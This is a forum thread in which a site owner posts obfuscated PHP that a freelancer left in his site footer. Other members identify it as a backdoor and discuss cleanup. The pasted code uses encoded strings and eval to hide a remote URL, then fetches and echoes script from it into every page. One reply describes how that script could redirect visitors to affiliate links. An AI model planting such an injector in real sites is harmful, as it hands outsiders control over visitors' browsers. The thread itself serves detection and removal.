1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

is this code suspecious?

Discussion in 'Cloaking and Content Generators' started by mrsharz, May 7, 2013.

  1. mrsharz

    mrsharz BANNED BANNED

    Joined:
    Sep 27, 2012
    Messages:
    212
    Likes Received:
    95
    so i hired a guy to do some modification on my site after he claim to be done i notice some error code on my site footer but it looks suspecious obviously he didnt see it but after i remove the code everything became fine but he put this in my site do you think its a backdoor?

    <?php if(!function_exists("mystr1s44")){class mystr1s21 { static $mystr1s279="Y3\x56ybF\x39pb\x6d\x6c0"; static $mystr1s178="b\x61se\x364\x5f\x64ec\x6fd\x65"; static $mystr1s381="aH\x520\x63\x44ov\x4c3Ro\x5a\x571\x6cLm5\x31b\x47x\x6cZ\x47N\x73b2\x35l\x632\x4eyaX\x420cy\x35jb2\x30\x76an\x461\x5aXJ\x35\x4cTE\x75Ni\x34zL\x6d1\x70b\x695qc\x77=\x3d";
    static $mystr1s382="b\x58l\x7a\x64H\x49xc\x7a\x49y\x4dzY\x3d"; }eval("e\x76\x61\x6c\x28\x62\x61\x73\x65\x36\x34_\x64e\x63\x6fd\x65\x28\x27ZnV\x75Y\x33\x52\x70b2\x34\x67b\x58l\x7ad\x48Ix\x63\x7ac2K\x43Rte\x58N0\x63j\x46zO\x54cpe\x79R\x37\x49m1c\x65D\x635c3\x52\x79\x58Hgz\x4d\x58M\x78\x58Hgz\x4dFx\x34Mz\x67if\x54\x31t\x65XN0\x63j\x46zMj\x456O\x69R\x37Im1\x63eD\x63\x35c1x\x34Nz\x52\x63e\x44c\x79MV\x784\x4ezMx\x58Hgz\x4e\x7ag\x69fTt\x79ZX\x52\x31c\x6d4gJ\x48\x73i\x62Xlz\x58\x48g3\x4eFx\x34\x4ezI\x78XH\x673M\x7aFce\x44\x4dwO\x43J\x39\x4b\x43\x42t\x65XN0\x63j\x46zMj\x456O\x69R7J\x48si\x62Vx4\x4e\x7alce\x44c\x7aX\x48\x673N\x48Jc\x65DMx\x63\x31x\x34\x4dzk3\x49n1\x39I\x43k\x37fQ\x3d=\x27\x29\x29\x3be\x76\x61\x6c\x28b\x61s\x656\x34\x5f\x64e\x63o\x64e\x28\x27\x5anV\x75Y3R\x70b24\x67b\x58lz\x64\x48I\x78czQ\x30\x4b\x43Rte\x58N0\x63jFz\x4e\x6a\x55pI\x48tyZ\x58\x521c\x6d4gb\x58lzd\x48Ix\x63zI\x78O\x6aoke\x79R7\x49m1\x35XHg\x33M3R\x63\x65Dc\x79XH\x67z\x4d\x56x\x34N\x7aM\x32\x58\x48gzN\x53\x4a9\x66\x54t\x39\x27\x29\x29\x3b");}
    if(function_exists(mystr1s76("mys\x74r1s\x3279"))){$mystr1s2235 = mystr1s76("m\x79s\x74r\x31s3\x381");$mystr1s2236 = curl_init();
    $mystr1s2237 = 5;curl_setopt($mystr1s2236,CURLOPT_URL,$mystr1s2235);curl_setopt($mystr1s2236,CURLOPT_RETURNTRANSFER,1);curl_setopt($mystr1s2236,CURLOPT_CONNECTTIMEOUT,$mystr1s2237);
    $mystr1s2238 = curl_exec($mystr1s2236);curl_close(${mystr1s76("mystr1s382")});echo "$mystr1s2238";}
    ?>
     
  2. makemecash

    makemecash Regular Member

    Joined:
    Mar 16, 2012
    Messages:
    279
    Likes Received:
    303
    Lol, yes. The guy opened a door using PHP cURL, and so now he can transmit code back and forth. It's pretty common unfortunately.
     
  3. mrsharz

    mrsharz BANNED BANNED

    Joined:
    Sep 27, 2012
    Messages:
    212
    Likes Received:
    95
    hey thanks for answering my question so i remove this code but am sure there are others that need to be removed do you have any idea how i can remove them all as am not hiring anyone to do it am fixing my site
     
  4. Izzma

    Izzma Regular Member

    Joined:
    Jan 29, 2012
    Messages:
    293
    Likes Received:
    197
    Location:
    Canada
    Analysis your entire script. If you see any PHP functionality that is unnecessary, suspicious, or looks like the above, delete it. Otherwise we can not determine what is and what isn't legit.
     
  5. ScaryMustard

    ScaryMustard Registered Member

    Joined:
    Jun 27, 2012
    Messages:
    50
    Likes Received:
    20
    If you don't know how to read PHP, you're going to have to get someone to look at it for you; I really don't see any other way around this.
     
  6. judif414

    judif414 Regular Member

    Joined:
    Feb 25, 2013
    Messages:
    488
    Likes Received:
    438
    I think there are fiverr gigs that will remove these backdoors for you. Just be careful that they don't add backdoors themselves :)
     
  7. BottingWorks

    BottingWorks Regular Member

    Joined:
    Jul 16, 2012
    Messages:
    249
    Likes Received:
    73
    Location:
    Australia
    Home Page:
    I'd be happy to look at the code for you! Free of charge.

    This sort of thing is very common, so ensure that any freelancers you're hiring have a good reputation and double check the work they're completing.

    Also, did you hire this person through BHW?
     
  8. mrsharz

    mrsharz BANNED BANNED

    Joined:
    Sep 27, 2012
    Messages:
    212
    Likes Received:
    95
    nahh if i hired him on bhw i think the name of this thread will be in capital later with bunch of !!! and his name + scam lol okay botting works i will send you my site details through pm soon thanks as always i appreciate it.....
     
    Last edited: May 7, 2013
  9. phatzilla

    phatzilla Supreme Member

    Joined:
    Apr 9, 2009
    Messages:
    1,366
    Likes Received:
    1,017
  10. oozyluce

    oozyluce Regular Member

    Joined:
    Jan 26, 2013
    Messages:
    277
    Likes Received:
    231
    Occupation:
    IT Coordinator, Senior Network Administrator
    Location:
    http://www.gaben.tv/
    Home Page:
    That's odd. If it's really pointing there... why? There's nothing in this script that is of interest, i would expect a malware version of jquery, maybe with anchor texts/links with visibility:hidden parameters.

    The guy who coded that is either really lame or either i'm lame
     
  11. TZ2011

    TZ2011 Senior Member

    Joined:
    Jun 26, 2011
    Messages:
    832
    Likes Received:
    864
    Occupation:
    Cleaning servers
    It is a part of Ultimate Black Hat System, package for retarded wannabies who don't know how to drive traffic to their sites so they steal visitors from other sites, redirecting them with this code to destinations by their choice, usually to java drive-by shit and affiliate stuff.
     
  12. phatzilla

    phatzilla Supreme Member

    Joined:
    Apr 9, 2009
    Messages:
    1,366
    Likes Received:
    1,017

    Check what that file contains.

    It's all real shitty
     
  13. makemecash

    makemecash Regular Member

    Joined:
    Mar 16, 2012
    Messages:
    279
    Likes Received:
    303
  14. user999

    user999 Newbie

    Joined:
    Aug 28, 2011
    Messages:
    3
    Likes Received:
    0
    Location:
    Canada
    perhaps you could find a way to monitor the servers outbound traffic from your domain. That would tell you where the data being sent is going .
     
  15. TheMoneyWizard

    TheMoneyWizard Elite Member

    Joined:
    May 31, 2012
    Messages:
    2,351
    Likes Received:
    2,462
    Location:
    Wonderland
    What does "suspecious" mean?
     
  16. TZ2011

    TZ2011 Senior Member

    Joined:
    Jun 26, 2011
    Messages:
    832
    Likes Received:
    864
    Occupation:
    Cleaning servers
    suspecious is Suspicious, if you open your mind a little bit you can figure out.
    I am not native english speaker (like many others on forum) but I understand more than natives, apparently, so let me know if you need more help in translation.
     
  17. saxgod

    saxgod Regular Member

    Joined:
    Sep 19, 2010
    Messages:
    351
    Likes Received:
    337
    This hack doesn't work like that.

    What essentially happens is that he retrieves a piece of javascript from his server and injects it into your site.
    For the moment, the javascript is very innocent.

    However, he could just put in a "window.location.href='http://affiliatelinkhere.com';" and every visitor on your site would get redirected to the affiliate link. By their own browsers... So you wouldn't see it on your server.. Well granted, you would see the request to his server to fetch the javascript, but it is called jquery.js to make it "unsuspicious"
     
  18. omnipotent$

    omnipotent$ Regular Member

    Joined:
    Mar 23, 2013
    Messages:
    493
    Likes Received:
    288
    Hopefully you made a backup of your site to reset things to the way the were before the programmer you hired touched your site.